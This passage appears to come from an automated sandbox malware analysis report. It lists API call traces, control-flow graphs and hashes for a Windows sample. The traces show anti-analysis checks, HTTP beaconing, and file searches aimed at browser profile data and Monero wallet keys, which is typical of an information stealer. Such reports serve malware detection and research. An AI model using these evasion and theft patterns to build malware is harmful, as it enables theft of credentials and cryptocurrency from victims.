                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0ED8), ref: 001598A1
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0F50), ref: 001598BA
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0E18), ref: 001598D2
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0DD0), ref: 001598EA
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0E30), ref: 00159903
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD8FC0), ref: 0015991B
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DC5220), ref: 00159933
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DC52E0), ref: 0015994C
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0EA8), ref: 00159964
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0F08), ref: 0015997C
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0E60), ref: 00159995
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0E90), ref: 001599AD
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DC51C0), ref: 001599C5
                                • Part of subcall function 00159860: GetProcAddress.KERNEL32(75900000,00DD0C68), ref: 001599DE
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 001411D0: ExitProcess.KERNEL32 ref: 00141211
                                • Part of subcall function 00141160: GetSystemInfo.KERNEL32(?), ref: 0014116A
                                • Part of subcall function 00141160: ExitProcess.KERNEL32 ref: 0014117E
                                • Part of subcall function 00141110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0014112B
                                • Part of subcall function 00141110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00141132
                                • Part of subcall function 00141110: ExitProcess.KERNEL32 ref: 00141143
                                • Part of subcall function 00141220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0014123E
                                • Part of subcall function 00141220: __aulldiv.LIBCMT ref: 00141258
                                • Part of subcall function 00141220: __aulldiv.LIBCMT ref: 00141266
                                • Part of subcall function 00141220: ExitProcess.KERNEL32 ref: 00141294
                                • Part of subcall function 00156770: GetUserDefaultLangID.KERNEL32 ref: 00156774
                                • Part of subcall function 00141190: ExitProcess.KERNEL32 ref: 001411C6
                                • Part of subcall function 00157850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001411B7), ref: 00157880
                                • Part of subcall function 00157850: RtlAllocateHeap.NTDLL(00000000), ref: 00157887
                                • Part of subcall function 00157850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0015789F
                                • Part of subcall function 001578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00157910
                                • Part of subcall function 001578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00157917
                                • Part of subcall function 001578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0015792F
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00DD90A0,?,0016110C,?,00000000,?,00161110,?,00000000,00160AEF), ref: 00156ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00156AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00156AF9
                              • Sleep.KERNEL32(00001770), ref: 00156B04
                              • CloseHandle.KERNEL32(?,00000000,?,00DD90A0,?,0016110C,?,00000000,?,00161110,?,00000000,00160AEF), ref: 00156B1A
                              • ExitProcess.KERNEL32 ref: 00156B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 90577678b61c3f85e874b1ceda239ec17f76cbac6ffb9bec849872e8cc60b439
                              • Instruction ID: 8a535cb2656f6521985320f2052b9427b1aa007db6883624df8f71c318fb279a
                              • Opcode Fuzzy Hash: 90577678b61c3f85e874b1ceda239ec17f76cbac6ffb9bec849872e8cc60b439
                              • Instruction Fuzzy Hash: 70314470980208EBDB05F7F0DC56BEE7778AF24702F904619F922AA191EF705949C7A2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 141220-141247 call 1589b0 GlobalMemoryStatusEx 1439 141273-14127a 1436->1439 1440 141249-141271 call 15da00 * 2 1436->1440 1442 141281-141285 1439->1442 1440->1442 1444 141287 1442->1444 1445 14129a-14129d 1442->1445 1447 141292-141294 ExitProcess 1444->1447 1448 141289-141290 1444->1448 1448->1445 1448->1447
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0014123E
                              • __aulldiv.LIBCMT ref: 00141258
                              • __aulldiv.LIBCMT ref: 00141266
                              • ExitProcess.KERNEL32 ref: 00141294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 0ade4c601c2f16b7aad7b718a51bcb29b6349352f58537a5cba433e622bb9ffa
                              • Instruction ID: 9585812e6be73a6690bdcbd11a595e2a7b8bb13c7702e72dfdbb9bb1de13f067
                              • Opcode Fuzzy Hash: 0ade4c601c2f16b7aad7b718a51bcb29b6349352f58537a5cba433e622bb9ffa
                              • Instruction Fuzzy Hash: E901FBB0A44308FAEB10DBE4DC49FAEBB78AB14706F208159FB05FA290D7B455858799

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 156af3 1451 156b0a 1450->1451 1453 156b0c-156b22 call 156920 call 155b10 CloseHandle ExitProcess 1451->1453 1454 156aba-156ad7 call 15aad0 OpenEventA 1451->1454 1460 156af5-156b04 CloseHandle Sleep 1454->1460 1461 156ad9-156af1 call 15aad0 CreateEventA 1454->1461 1460->1451 1461->1453
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00DD90A0,?,0016110C,?,00000000,?,00161110,?,00000000,00160AEF), ref: 00156ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00156AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00156AF9
                              • Sleep.KERNEL32(00001770), ref: 00156B04
                              • CloseHandle.KERNEL32(?,00000000,?,00DD90A0,?,0016110C,?,00000000,?,00161110,?,00000000,00160AEF), ref: 00156B1A
                              • ExitProcess.KERNEL32 ref: 00156B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 96f4d64df53cf3da5fcdc55b91a49a192c9587e5422a2c04aa6d41fb8ec9717f
                              • Instruction ID: 84737e6ca417e6156c9a3b76e6c151071eb2b1e0a9091d4e6d61bc18a455df21
                              • Opcode Fuzzy Hash: 96f4d64df53cf3da5fcdc55b91a49a192c9587e5422a2c04aa6d41fb8ec9717f
                              • Instruction Fuzzy Hash: D9F03A70A40309EBF700ABA0DC0ABBD7A78EB14702F904555BD23AB1D1DBB05548D6E6

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00144839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00144849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 687009bedf6cc9bc4f3229d7deee0873329f7fd868ccee541ea95674850ca00c
                              • Instruction ID: e44026be986828b5cf0575e0111120956876f561a93e62be7d44fcb0015f49c7
                              • Opcode Fuzzy Hash: 687009bedf6cc9bc4f3229d7deee0873329f7fd868ccee541ea95674850ca00c
                              • Instruction Fuzzy Hash: 8A213EB1D00209ABDF14DFA5EC45ADE7B75FF44320F508625F925AB291EB706A09CB81

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 00146280: InternetOpenA.WININET(00160DFE,00000001,00000000,00000000,00000000), ref: 001462E1
                                • Part of subcall function 00146280: StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 00146303
                                • Part of subcall function 00146280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00146335
                                • Part of subcall function 00146280: HttpOpenRequestA.WININET(00000000,GET,?,00DDE578,00000000,00000000,00400100,00000000), ref: 00146385
                                • Part of subcall function 00146280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001463BF
                                • Part of subcall function 00146280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001463D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00155228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: ac0c6a1d6ddb73a7c703be5e882c4a6758dbb933f4bd385054dfdd67fd755fad
                              • Instruction ID: 930dec45f5233f01d66e2814d7795e4a3004a76ce7048b366e3d5f1c49c06a72
                              • Opcode Fuzzy Hash: ac0c6a1d6ddb73a7c703be5e882c4a6758dbb933f4bd385054dfdd67fd755fad
                              • Instruction Fuzzy Hash: A7110D30940108E6CB14FF60DD52AED7738AF60301F804254FC2A4E192EF306B09C691
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00157910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00157917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0015792F
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 12e49b95149a2dc5a7f08bd72c3de675db2aab9d6132bc5d2a340b438a048ae4
                              • Instruction ID: e38398d37cbb64421ac1963bfba6e34d5b83f03ba6d9be0d89c9ad88186d3ef7
                              • Opcode Fuzzy Hash: 12e49b95149a2dc5a7f08bd72c3de675db2aab9d6132bc5d2a340b438a048ae4
                              • Instruction Fuzzy Hash: 900162B1904604EBD714DF94DD45FAAFBBCF704B26F10425AEA55A7280C37459048BA1
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0014112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00141132
                              • ExitProcess.KERNEL32 ref: 00141143
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: a885fbfd19389e4867fd04ee4a0af0b88ba7fc377cb57f74ca6ddd245b220123
                              • Instruction ID: 3acc3a58398f03f50c670c204fe8dc81e6cbde271524bd770044549743c67fef
                              • Opcode Fuzzy Hash: a885fbfd19389e4867fd04ee4a0af0b88ba7fc377cb57f74ca6ddd245b220123
                              • Instruction Fuzzy Hash: 1EE0E671985308FBF711ABA09C0AB097A7CAB04B41F104195F709771D0D7B52640979A
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001410B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001410F7
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: e92aca30a4508f00c10babfbeb6966bba84c2eae38177588ea27c110f110dd50
                              • Instruction ID: f88eee3d28ff83d53d137eae6f22e2a94a35633245f7cf4f7c1e310824f5317a
                              • Opcode Fuzzy Hash: e92aca30a4508f00c10babfbeb6966bba84c2eae38177588ea27c110f110dd50
                              • Instruction Fuzzy Hash: 6CF0E271641308BBE7149AA4AC59FAAB7ECE705B15F300448F904E7290D6719E40DBA0
                              APIs
                                • Part of subcall function 001578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00157910
                                • Part of subcall function 001578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00157917
                                • Part of subcall function 001578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0015792F
                                • Part of subcall function 00157850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001411B7), ref: 00157880
                                • Part of subcall function 00157850: RtlAllocateHeap.NTDLL(00000000), ref: 00157887
                                • Part of subcall function 00157850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0015789F
                              • ExitProcess.KERNEL32 ref: 001411C6
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 71d653ece90246c3b6deecb0c7edcf03951bf9aa026bf6a2f3a7a1d094b5f838
                              • Instruction ID: a2f0e748f9f0bcf95cda07dc369720fb4423dc2495cc22a6cc205e33000d8dc4
                              • Opcode Fuzzy Hash: 71d653ece90246c3b6deecb0c7edcf03951bf9aa026bf6a2f3a7a1d094b5f838
                              • Instruction Fuzzy Hash: D2E012B5914301A7DE0073B1BC0BB2A329C5B24747F040865FE15D7152FF69E944866A
                              APIs
                              • wsprintfA.USER32 ref: 001538CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 001538E3
                              • lstrcat.KERNEL32(?,?), ref: 00153935
                              • StrCmpCA.SHLWAPI(?,00160F70), ref: 00153947
                              • StrCmpCA.SHLWAPI(?,00160F74), ref: 0015395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00153C67
                              • FindClose.KERNEL32(000000FF), ref: 00153C7C
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 218f77c6bed745a5156d1160d7703cadb9eec9cb438a3e9d755465b1b455f16c
                              • Instruction ID: ef4d9bcffa1e0a094d3cd89554e5b9b5a9524cd2c7b9b7e96ea06f0d7bb45320
                              • Opcode Fuzzy Hash: 218f77c6bed745a5156d1160d7703cadb9eec9cb438a3e9d755465b1b455f16c
                              • Instruction Fuzzy Hash: EFA12FB1900218EBDB25DFA4DC85FEA737CBB58301F044589BA1D9B141EB759B88CF62
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                              • FindFirstFileA.KERNEL32(00000000,?,00160B32,00160B2B,00000000,?,?,?,001613F4,00160B2A), ref: 0014BEF5
                              • StrCmpCA.SHLWAPI(?,001613F8), ref: 0014BF4D
                              • StrCmpCA.SHLWAPI(?,001613FC), ref: 0014BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0014C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0014C7D1
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: e9b26144bf7c9d7199f2c8bc01bc423ca0bfaaeb302b4e78fc6282d1337523c0
                              • Instruction ID: e3ae0fe95032fbeb3dab67582921acaef6df2dbfb45713c85a389a81fdc40406
                              • Opcode Fuzzy Hash: e9b26144bf7c9d7199f2c8bc01bc423ca0bfaaeb302b4e78fc6282d1337523c0
                              • Instruction Fuzzy Hash: 35426572950108EBDB14FBB0DC96EED733DAF64301F804658B9169A191EF349B4DCBA2
                              APIs
                              • wsprintfA.USER32 ref: 0015492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00154943
                              • StrCmpCA.SHLWAPI(?,00160FDC), ref: 00154971
                              • StrCmpCA.SHLWAPI(?,00160FE0), ref: 00154987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00154B7D
                              • FindClose.KERNEL32(000000FF), ref: 00154B92
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: df599522885d4c31a2a1472dfd25860125ecfd81b3c07edd2cfb6a0f9e302f38
                              • Instruction ID: bd708a40ceb6570b789e82efe7eaef93fec82bb1a842f9be6f64185c65e113d9
                              • Opcode Fuzzy Hash: df599522885d4c31a2a1472dfd25860125ecfd81b3c07edd2cfb6a0f9e302f38
                              • Instruction Fuzzy Hash: 206197B2900618ABDB21EFA0DC45FEA777CBB58705F0445C9F60996040EB75EB89CFA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00154580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00154587
                              • wsprintfA.USER32 ref: 001545A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 001545BD
                              • StrCmpCA.SHLWAPI(?,00160FC4), ref: 001545EB
                              • StrCmpCA.SHLWAPI(?,00160FC8), ref: 00154601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0015468B
                              • FindClose.KERNEL32(000000FF), ref: 001546A0
                              • lstrcat.KERNEL32(?,00DDEB00), ref: 001546C5
                              • lstrcat.KERNEL32(?,00DDDA08), ref: 001546D8
                              • lstrlen.KERNEL32(?), ref: 001546E5
                              • lstrlen.KERNEL32(?), ref: 001546F6
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 880296b99d3aa3e5821cba9891e7f1a87030afbcb90098e3c084ecde7e6a1384
                              • Instruction ID: 4cb061b0f0d587b51a48509594901e597a82f5c90fe3f71b1389cc6412477b6b
                              • Opcode Fuzzy Hash: 880296b99d3aa3e5821cba9891e7f1a87030afbcb90098e3c084ecde7e6a1384
                              • Instruction Fuzzy Hash: 5D5187B1540318ABD725EBB0DC89FEE777CAB58301F4045C9F61996190EB749B88CFA2
                              APIs
                              • wsprintfA.USER32 ref: 00153EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00153EDA
                              • StrCmpCA.SHLWAPI(?,00160FAC), ref: 00153F08
                              • StrCmpCA.SHLWAPI(?,00160FB0), ref: 00153F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0015406C
                              • FindClose.KERNEL32(000000FF), ref: 00154081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 9ffc8ccc524d361a2aa352a55e81a050fc4796d7af849dc4332372ad3a9c18e3
                              • Instruction ID: e3416d66c342244071d98725afd7d163270d13e7b9073fc4f735af8ec4b74665
                              • Opcode Fuzzy Hash: 9ffc8ccc524d361a2aa352a55e81a050fc4796d7af849dc4332372ad3a9c18e3
                              • Instruction Fuzzy Hash: 6D519BB1900718EBCB25EBB0DC85EEA777CBB58301F4045C9B66996040DB75DB89CF61
